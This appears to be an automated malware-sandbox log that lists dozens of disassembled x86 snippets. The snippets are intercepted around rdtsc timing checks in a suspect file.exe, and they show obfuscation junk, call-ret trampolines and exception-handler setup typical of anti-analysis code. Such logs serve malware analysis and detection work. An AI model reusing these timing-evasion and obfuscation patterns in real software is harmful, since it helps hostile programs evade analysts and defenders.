Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1521A17 second address: 1521A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1B74h], ecx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F27A8DB97C8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F27A8DB97C8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 jc 00007F27A8DB97C8h 0x0000004f push edx 0x00000050 pop edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15222F4 second address: 15222F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15222F9 second address: 1522375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F27A8DB97C8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov di, C71Dh 0x00000026 movzx edi, ax 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F27A8DB97C8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 clc 0x00000046 mov dword ptr [ebp+122D2E5Eh], ebx 0x0000004c push 00000000h 0x0000004e mov si, 0960h 0x00000052 xchg eax, ebx 0x00000053 jmp 00007F27A8DB97D7h 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1522375 second address: 1522379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1522E37 second address: 1522E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1522BC3 second address: 1522BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F27A8DEEC28h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1522BD3 second address: 1522BD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15248B8 second address: 15248BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1525939 second address: 152593F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152593F second address: 1525943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1524A27 second address: 1524A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152694E second address: 1526958 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F27A8DEEC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1527B27 second address: 1527B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1528898 second address: 1528909 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F27A8DEEC26h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jo 00007F27A8DEEC3Ah 0x00000017 jmp 00007F27A8DEEC34h 0x0000001c mov edi, 06D0B261h 0x00000021 push 00000000h 0x00000023 call 00007F27A8DEEC2Ah 0x00000028 call 00007F27A8DEEC39h 0x0000002d mov edi, dword ptr [ebp+122D1B1Eh] 0x00000033 pop ebx 0x00000034 pop ebx 0x00000035 push 00000000h 0x00000037 mov bx, si 0x0000003a push eax 0x0000003b jl 00007F27A8DEEC34h 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007F27A8DEEC26h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1527B2B second address: 1527B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1527B2F second address: 1527B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1527C19 second address: 1527C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1527C1E second address: 1527C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F27A8DEEC26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152AA65 second address: 152AA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152AA69 second address: 152AA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152AA6D second address: 152AAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F27A8DB97D9h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F27A8DB97C8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d ja 00007F27A8DB97CDh 0x00000033 jmp 00007F27A8DB97D9h 0x00000038 push 00000000h 0x0000003a movzx edi, dx 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push esi 0x00000040 jmp 00007F27A8DB97CCh 0x00000045 pop esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1529C56 second address: 1529C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F27A8DEEC35h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152AAF3 second address: 152AAF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1529C77 second address: 1529C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152AAF7 second address: 152AB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1529C7B second address: 1529D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 jmp 00007F27A8DEEC34h 0x0000000d call 00007F27A8DEEC2Ah 0x00000012 mov ebx, dword ptr [ebp+122D1CFFh] 0x00000018 pop ebx 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F27A8DEEC28h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F27A8DEEC28h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000016h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b add ebx, dword ptr [ebp+122D17AEh] 0x00000061 mov eax, dword ptr [ebp+122D0389h] 0x00000067 sub dword ptr [ebp+12488746h], ebx 0x0000006d push FFFFFFFFh 0x0000006f pushad 0x00000070 adc edi, 7FBE82F4h 0x00000076 mov dword ptr [ebp+12455A27h], edx 0x0000007c popad 0x0000007d push eax 0x0000007e push eax 0x0000007f push edx 0x00000080 jg 00007F27A8DEEC28h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1529D1E second address: 1529D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DB97CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152BB9B second address: 152BBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152CCA1 second address: 152CCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152BD30 second address: 152BD36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152BD36 second address: 152BD3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152BD3A second address: 152BDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F27A8DEEC28h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push edi 0x00000026 jmp 00007F27A8DEEC38h 0x0000002b pop edi 0x0000002c push dword ptr fs:[00000000h] 0x00000033 clc 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b pushad 0x0000003c jmp 00007F27A8DEEC2Bh 0x00000041 popad 0x00000042 mov eax, dword ptr [ebp+122D093Dh] 0x00000048 cmc 0x00000049 push FFFFFFFFh 0x0000004b mov ebx, dword ptr [ebp+122D376Dh] 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 js 00007F27A8DEEC26h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152BDB9 second address: 152BDBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152BDBF second address: 152BDC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152DD5B second address: 152DD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152DD5F second address: 152DD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152FDF8 second address: 152FE0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152FE0F second address: 152FE97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D2E32h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F27A8DEEC28h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f or bl, FFFFFFE3h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F27A8DEEC28h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 pushad 0x00000051 push ecx 0x00000052 pop ecx 0x00000053 jmp 00007F27A8DEEC2Fh 0x00000058 popad 0x00000059 push eax 0x0000005a push edx 0x0000005b jc 00007F27A8DEEC26h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152FE97 second address: 152FEA8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F27A8DB97C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152FEA8 second address: 152FEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152FEAC second address: 152FEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1530D7D second address: 1530DF3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F27A8DEEC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F27A8DEEC28h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a sub dword ptr [ebp+122D1D50h], eax 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F27A8DEEC28h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c xchg eax, esi 0x0000004d jne 00007F27A8DEEC2Eh 0x00000053 push eax 0x00000054 pushad 0x00000055 jmp 00007F27A8DEEC2Eh 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152DEC0 second address: 152DEE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F27A8DB97CCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152DEE0 second address: 152DEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152EF0D second address: 152EF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152DEE5 second address: 152DEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 152CE7F second address: 152CE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1534527 second address: 1534531 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F27A8DEEC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1534531 second address: 153457F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F27A8DB97CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F27A8DB97CBh 0x00000010 nop 0x00000011 xor dword ptr [ebp+122D2E71h], esi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F27A8DB97C8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push 00000000h 0x00000035 stc 0x00000036 push eax 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1532057 second address: 15320D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F27A8DEEC2Bh 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F27A8DEEC28h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov eax, dword ptr [ebp+122D0431h] 0x0000003f jmp 00007F27A8DEEC30h 0x00000044 push FFFFFFFFh 0x00000046 push ecx 0x00000047 jmp 00007F27A8DEEC2Ch 0x0000004c pop edi 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15320D3 second address: 15320D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15356E0 second address: 15356E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1538AE8 second address: 1538AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1538AEC second address: 1538AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1538AF2 second address: 1538AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1538AFD second address: 1538B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F27A8DEEC32h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14CE6F5 second address: 14CE6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14CE6FB second address: 14CE6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14E0E16 second address: 14E0E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 153EA91 second address: 153EA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 153EA99 second address: 153EAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F27A8DB97D5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15401A5 second address: 15401B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15401B0 second address: 15401B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15401B4 second address: 15401BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154313C second address: 1543148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F27A8DB97C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1543148 second address: 154314E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154314E second address: 1543161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jbe 00007F27A8DB97C6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15432C1 second address: 15432E1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F27A8DEEC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F27A8DEEC36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15432E1 second address: 1543310 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CFh 0x00000007 jc 00007F27A8DB97D8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F27A8DB97D0h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ebx 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1543449 second address: 1543462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Fh 0x00000007 jnl 00007F27A8DEEC26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1549554 second address: 154955A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154968C second address: 1549692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1549749 second address: 154974F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154974F second address: 1549754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1549754 second address: 154976F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DB97D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154976F second address: 1549793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F27A8DEEC2Eh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jng 00007F27A8DEEC34h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1549793 second address: 1549799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
